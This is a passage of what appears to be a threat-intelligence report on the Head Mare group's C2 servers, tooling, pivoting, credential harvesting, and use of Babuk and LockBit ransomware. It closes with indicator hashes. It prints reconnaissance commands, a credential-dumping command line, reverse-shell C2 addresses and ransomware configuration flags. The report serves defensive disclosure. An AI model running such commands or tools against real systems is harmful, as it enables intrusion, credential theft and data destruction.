2022</td><td>56694</td></tr><tr><td>45.87.246[.]169</td><td>June 26, 2024</td><td>212165</td></tr><tr><td>45.87.245[.]30</td><td>–</td><td>57494</td></tr><tr><td>185.80.91[.]107</td><td>July 10, 2024</td><td>212165</td></tr><tr><td>91.219.151[.]47</td><td>May 02, 2024</td><td>56694</td></tr><tr><td>5.252.176[.]47</td><td>–</td><td>39798</td></tr><tr><td>5.252.176[.]77</td><td>October 29, 2023</td><td>39798</td></tr></tbody></table><p>Various utilities used at different stages of the attacks were found on the attackers’ C2 servers. The same utilities often appeared on different servers with identical file names.</p><div id="attachment_113579" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113579" class="size-large wp-image-113579" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-1024x426.png" alt="Analysis of Head Mare's C2 infrastructure" width="1024" height="426" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-1024x426.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-300x125.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-768x320.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-1536x639.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-841x350.png 841w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-740x308.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-673x280.png 673w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-800x333.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113579" class="wp-caption-text">Analysis of Head Mare’s C2 infrastructure</p></div><p>Below is a list of tools found on one of the attackers’ command servers:</p><div id="attachment_113580" style="width: 775px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113580" class="size-full wp-image-113580" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04.png" alt="Contents of one of the C2 server directories" width="765" height="584" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04.png 765w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-300x229.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-458x350.png 458w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-740x565.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-367x280.png 367w" sizes="(max-width: 765px) 100vw, 765px" /></a><p id="caption-attachment-113580" class="wp-caption-text">Contents of one of the C2 server directories</p></div><table width="100%"><tbody><tr><td style="text-align: center" width="25%"><strong>Utility name</strong></td><td style="text-align: center" width="75%"><strong>Description</strong></td></tr><tr><td>2000×2000.php</td><td>PHP shell for executing commands on the server. This shell is called p0wny@shell:~# and is available on GitHub at hxxps://github[.]com/flozz/p0wny-shell.</td></tr><tr><td>LEGISLATIVE_COUSIN.exe</td><td rowspan="2">Sliver implant.<br />Connects to 5.252.176[.]77:8888.</td></tr><tr><td>SOFT_KNITTING.exe</td></tr><tr><td>sherlock.ps1</td><td>PowerShell script for quickly finding vulnerabilities for local privilege escalation, available on GitHub at hxxps://github[.]com/rasta-mouse/Sherlock/tree/master.</td></tr><tr><td>ngrok.exe</td><td>ngrok utility.</td></tr><tr><td>reverse.exe</td><td>Meterpreter.<br />Connects to 5.252.176[.]77:45098.</td></tr><tr><td>servicedll.exe</td><td>nssm utility for managing services.</td></tr><tr><td>sysm.elf</td><td>Unix reverse shell using the sys_connect function to connect to the attacker’s C2. If the connection attempt fails, the program enters sleep mode for 5 seconds using the sys_nanosleep function before trying again. Connects to 5.252.176[.]77:45098.</td></tr><tr><td>Xmrig*</td><td>XMRig miner. Not used in any attacks known to us.</td></tr></tbody></table><h3 id="pivoting">Pivoting</h3><p>Pivoting is a set of methods that allow an attacker to gain access to private network segments using compromised machines as intermediate nodes. For this purpose, the attackers use the ngrok and rsockstun utilities.</p><p>The rsockstun utility creates a reverse SOCKS5 tunnel with SSL and proxy server support. It allows a client behind a NAT or firewall to connect to a server via a secure connection and use SOCKS5 to forward traffic.</p><p>We analyzed the utility’s code and identified its key functions:</p><table width="100%"><tbody><tr><td style="text-align: center" width="50%"><strong>Client</strong></td><td style="text-align: center" width="50%"><strong>Server</strong></td></tr><tr><td><strong>ConnectViaProxy function:</strong></p><ul><li>Establishes a connection with the server through a proxy.</li><li>Supports NTLM authentication for proxy servers.</li><li>Creates and sends requests to the proxy server and processes responses.</li></ul><p><strong>ConnectForSocks function:</strong></p><ul><li>Establishes a connection with the server via SOCKS5.</li><li>Establishes an SSL connection to the server.</li><li>Authenticates using a password.</li><li>Creates a Yamux session for multiplexing connections.</li></ul></td><td><strong>listenForSocks function:</strong></p><ul><li>Waits for client connections via SSL.</li><li>Verifies the existence and correctness of the connection password.</li><li>Creates a Yamux client session.</li></ul><p><strong>listenForClients function:</strong></p><ul><li>Waits for local client connections.</li><li>Opens a Yamux stream and forwards traffic between the local client and the remote server.</li></ul></td></tr></tbody></table><div id="attachment_113581" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113581" class="size-large wp-image-113581" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-1024x710.png" alt="Fragment of rsockstun code containing one of the Head Mare C2 addresses" width="1024" height="710" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-1024x710.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-300x208.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-768x532.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-505x350.png 505w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-740x513.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-404x280.png 404w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-800x555.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13.png 1310w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113581" class="wp-caption-text">Fragment of rsockstun code containing one of the Head Mare C2 addresses</p></div><p>Ngrok is a cross-platform utility designed to create secure tunnels to local web servers over the internet. It allows quick and easy access to local services and applications by providing public URLs that can be used to access the server externally.</p><h3 id="network-exploration">Network exploration</h3><p>After successfully gaining a foothold on the initial node, attackers execute a series of commands to further explore the node, domain, and network environment:</p><table width="100%"><tbody><tr><td style="text-align: center" width="40%"><strong>Command</strong></td><td style="text-align: center" width="60%"><strong>Description</strong></td></tr><tr><td>cmd /c “echo %USERDOMAIN%”</td><td>Retrieve the victim’s domain name</td></tr><tr><td>arp -a</td><td>Retrieve the ARP cache for all network interfaces on the compromised system</td></tr><tr><td>“cmd /c “cd /d $selfpath && whoami</td><td>Gather information about the current user’s name and domain</td></tr><tr><td>cmd /c “cd /d $appdata && powershell Get-ScheduledTask -TaskName “WindowsCore”</td><td>Search for a scheduled task named WindowsCore</td></tr></tbody></table><h3 id="credential-harvesting">Credential harvesting</h3><p>To collect credentials, attackers use the mimikatz utility.</p><p>In addition, to obtain additional credentials from the system, attackers use the console version of the XenArmor All-In-One Password Recovery Pro3 utility (XenAllPasswordPro), which can extract user credentials from registry hives.</p><pre class="crayon-plain-tag">"c:\ProgramData\update\XenAllPasswordPro.exe" -a "c:\ProgramData\update\report.html"</pre><p><h3 id="end-goal-file-encryption">End goal: file encryption</h3><p>While studying Head Mare attacks, we discovered the use of two ransomware families:</p><ul><li>LockBit for Windows;</li><li>Babuk for ESXi.</li></ul><h4 id="babuk">Babuk</h4><p>The Babuk variant we discovered is a 64-bit build for ESXi, created using a publicly available configurator. The Trojan uses standard encryption algorithms for Babuk builds for ESXi – X25519 + SHA256 + Sosemanuk, as well as the standard extension for encrypted files, *.babyk.</p><div id="attachment_113583" style="width: 794px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113583" class="size-full wp-image-113583" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09.png" alt="Kaspersky Threat Attribution Engine results for the found Babuk samples" width="784" height="242" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09.png 784w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09-300x93.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09-768x237.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09-740x228.png 740w" sizes="(max-width: 784px) 100vw, 784px" /></a><p id="caption-attachment-113583" class="wp-caption-text">Kaspersky Threat Attribution Engine results for the found Babuk samples</p></div><p>The distinctive features of the discovered Trojan are:</p><ul><li>Ability to log its activities in /tmp/locker.log.</li><li>Ability to destroy running virtual machines, the list of which is taken from the vm-list.txt file. This file is populated when the <pre class="crayon-plain-tag">esxcli vm process listd</pre> command is called.</li></ul><p>The Babuk sample we found encrypts files with the following extensions:</p><table width="100%"><tbody><tr><td width="33%">.vmdk</td><td width="34%">.vmem</td><td width="33%">.vswp</td></tr><tr><td>.vmsn</td><td>.bak</td><td>.vhdx</td></tr></tbody></table><p>After encryption is complete, it leaves a ransom note. Below is an example of the note, which contains a unique identifier for the Session messenger and the message “Message us for decryption ^_^.”</p><div id="attachment_113584" style="width: 849px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113584" class="size-full wp-image-113584" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15.png" alt="Babuk sample ransom note" width="839" height="156" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15.png 839w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-300x56.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-768x143.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-740x138.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-800x149.png 800w" sizes="(max-width: 839px) 100vw, 839px" /></a><p id="caption-attachment-113584" class="wp-caption-text">Babuk sample ransom note</p></div><h4 id="lockbit">LockBit</h4><p>The LockBit builds we found in Head Mare attacks are identical to samples generated by the publicly available LockBit builder, which was leaked online in 2022. The attackers distributed LockBit under the following names:</p><ul><li>lb3.exe</li><li>lock.exe</li><li>OneDrive.exe</li><li>lockbithard.exe</li><li>lockbitlite.exe</li><li>phdays.exe</li><li>l.exe</li><li>VLC.exe</li></ul><p>The ransomware was located in the following paths:</p><ul><li>c:\Users\User\Desktop;</li><li>c:\ProgramData\.</li></ul><p>The attackers used two of these ransomware versions sequentially – lockbitlite.exe and then lockbithard.exe. First, they encrypted files using LockbitLite, and then additionally encrypted the output with the LockbitHard variant.</p><p>The configuration of these variants differed slightly.</p><table width="100%"><tbody><tr><td style="text-align: left" width="50%"><strong>LockbitLite</strong></td><td style="text-align: left" width="50%"><strong>LockbitHard</strong></td></tr><tr><td>“encrypt_filename”: false,</td><td>“encrypt_filename”: true,</td></tr><tr><td>“wipe_freespace”: false,</td><td>“wipe_freespace”: true,</td></tr><tr><td>“white_folders”: “$recycle.bin;config.msi;$windows.~bt;$w<br />indows.~ws;windows;boot”,</td><td>“white_folders”: “”,</td></tr></tbody></table><p>Examples of the notes from both samples, which are generated when the Trojan is created in the configurator, are presented below.</p><div id="attachment_113585" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113585" class="size-large wp-image-113585" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-1024x688.png" alt="Ransom note from LockBit sample" width="1024" height="688" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-1024x688.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-768x516.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-521x350.png 521w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-740x497.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-417x280.png 417w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-800x538.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05.png 1159w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113585" class="wp-caption-text">Ransom note from LockBit sample</p></div><div id="attachment_113586" style="width: 683px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113586" class="size-full wp-image-113586" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07.png" alt="Ransom note from another LockBit sample" width="673" height="540" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07.png 673w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-300x241.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-500x400.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-436x350.png 436w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-349x280.png 349w" sizes="(max-width: 673px) 100vw, 673px" /></a><p id="caption-attachment-113586" class="wp-caption-text">Ransom note from another LockBit sample</p></div><h2 id="victimology">Victimology</h2><p>According to Kaspersky Threat Intelligence, all samples related to Head Mare were detected only in Russia and Belarus. The screenshot below shows the analysis of the PhantomDL sample on the Threat Intelligence Portal.</p><div id="attachment_113587" style="width: 943px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113587" class="size-full wp-image-113587" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map.png" alt="Information about the PhantomDL sample from TIP" width="933" height="614" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map.png 933w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-300x197.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-768x505.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-532x350.png 532w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-740x487.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-425x280.png 425w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-800x526.png 800w" sizes="(max-width: 933px) 100vw, 933px" /></a><p id="caption-attachment-113587" class="wp-caption-text">Information about the PhantomDL sample from TIP</p></div><h2 id="samples-similar-to-head-mares-toolkit">Samples similar to Head Mare’s toolkit</h2><p>To get a more complete picture, we analyzed samples seen in Head Mare attacks using the <a href="https://www.kaspersky.com/enterprise-security/threat-analysis%23similarity" target="_blank" rel="noopener">Similarity technology</a>, which helps us find similar malware samples. While we can’t say for certain that the discovered files were also used by Head Mare, their similarity may help in attributing cyberattacks and further analyzing the group’s activities.</p><h3 id="phantomdl">PhantomDL</h3><table width="100%"><tbody><tr><td width="50%"><strong>MD5 of the original sample</strong></td><td width="50%"><strong>MD5 of similar samples</strong></td></tr><tr><td><a href="https://opentip.kaspersky.com/15333D5315202EA428DE43655B598EDA/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______017cbd89b9d2ac33&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">15333D5315202EA428DE43655B598EDA</a></td><td><a href="https://opentip.kaspersky.com/A2BD0B9B64FBDB13537A4A4A1F3051C0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3934c1e8a07fed77&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">A2BD0B9B64FBDB13537A4A4A1F3051C0</a></td></tr></tbody></table><h3 id="phantomcore">PhantomCore</h3><table width="100%"><tbody><tr><td width="50%"><strong>MD5 of the original sample</strong></td><td width="50%"><strong>MD5 of similar samples</strong></td></tr><tr><td><a href="https://opentip.kaspersky.com/16F97EC7E116FE3272709927AB07844E/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ead8466beb017f2a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">16F97EC7E116FE3272709927AB07844E</a></td><td><a href="https://opentip.kaspersky.com/855B1CBA23FB51DA5A8F34F11C149538/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b7503f4701fdd1bc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">855B1CBA23FB51DA5A8F34F11C149538</a></td></tr><tr><td><a href="https://opentip.kaspersky.com/55239CC43BA49947BB1E1178FB0E9748/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fbacb6abe9286d12&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">55239CC43BA49947BB1E1178FB0E9748</a></td><td><a href="https://opentip.kaspersky.com/0E14852853F54023807C999B4FF55F64/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5e99078eee3e5381&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">0E14852853F54023807C999B4FF55F64</a><br /><a href="https://opentip.kaspersky.com/99B0F80E9AE2F1FB15BFE5F068440AB8/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______18269dcb73b41347&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">99B0F80E9AE2F1FB15BFE5F068440AB8</a></td></tr></tbody></table><h3 id="lockbit">LockBit</h3><table width="100%"><tbody><tr><td width="50%"><strong>MD5 of the original sample</strong></td><td width="50%"><strong>MD5 of similar samples</strong></td></tr><tr><td><a href="https://opentip.kaspersky.com/76B23DD72A883D8B1302BB4A514B7967/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______263b5246c05aad5d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">76B23DD72A883D8B1302BB4A514B7967 </a></td><td><a href="https://opentip.kaspersky.com/6DDC56E77F57A069539DCC7F97064983/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b0345ec8f522ae96&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">6DDC56E77F57A069539DCC7F97064983</a><br /><a href="https://opentip.kaspersky.com/7ACC6093D1BC18866CDD3FECCB6DA26A/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ad17e9f06ed12aa4&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7ACC6093D1BC18866CDD3FECCB6DA26A</a><br /><a href="https://opentip.kaspersky.com/59242B7291A77CE3E59D715906046148/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a0845a4395859787&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">59242B7291A77CE3E59D715906046148</a></td></tr><tr><td><a href="https://opentip.kaspersky.com/6568AB1C62E61237BAF4A4B09C16BB86/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8d594a61e756ed2a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">6568AB1C62E61237BAF4A4B09C16BB86</a></td><td><a href="https://opentip.kaspersky.com/F7ABDAAE63BF59CA468124C48257F752/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2f083e0c0546d151&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">F7ABDAAE63BF59CA468124C48257F752</a><br /><a href="https://opentip.kaspersky.com/79D871FF25D9D8A1F50B998B28FF752D/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8541abc68fab6b6d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">79D871FF25D9D8A1F50B998B28FF752D</a><br /><a href="https://opentip.kaspersky.com/78CC508882ABA99425E4D5A470371CB1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f80b65ccf89da62a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">78CC508882ABA99425E4D5A470371CB1</a><br /><a href="https://opentip.kaspersky.com/1D2D6E2D30933743B941F63E767957FB/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5298b057a5e3fd41&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1D2D6E2D30933743B941F63E767957FB</a></td></tr></tbody></table><h2 id="conclusions">Conclusions</h2><p>The tactics, methods, procedures, and tools used by the Head Mare group are generally similar to those of other groups associated with clusters targeting organizations in Russia and Belarus within the context of the Russo-Ukrainian conflict. However, the group distinguishes itself by using custom-made malware such as PhantomDL and PhantomCore, as well as exploiting a relatively new vulnerability, CVE-2023-38831, to infiltrate the infrastructure of their victims in phishing campaigns. This is an important aspect that Russian and Belarusian organizations should pay attention to: attackers are evolving and improving their TTPs.</p><h2 id="indicators-of-compromise">Indicators of compromise</h2><p><em>Please note: The network addresses provided in this section are valid at the time of publication but may become outdated in the future.</em></p><p><strong>Hashes:</strong><br /><a href="https://opentip.kaspersky.com/201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______20663a65803c5fe4&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8</a><br /><a href="https://opentip.kaspersky.com/9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b776970cef1f56fc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69</a><br /><a href="https://opentip.kaspersky.com/08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______576bb11f1c097a03&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470</a><br /><a href="https://opentip.kaspersky.com/6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4119a9d879ab8018&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263</a><br /><a href="https://opentip.kaspersky.com/33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______571af1127ddea524&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A</a><br /><a href="https://opentip.kaspersky.com/5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4fae6f06eba530e9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03</a><br /><a href="https://opentip.kaspersky.com/9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0d1b73ba766e4c3a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0</a><br /><a href="https://opentip.kaspersky.com/5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______095f1a8f46a56c93&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9</a><br /><a href="https://opentip.kaspersky.com/DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______81460b6f4f9fd474&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA</a><br /><a href="https://opentip.kaspersky.com/053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ec0b23676cbb79fc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD</a><br /><a href="https://opentip.kaspersky.com/2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6e1d8260d2bc6655&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921</a><br /><a href="https://opentip.kaspersky.com/015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______836ef5b8043302b9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343</a><br /><a 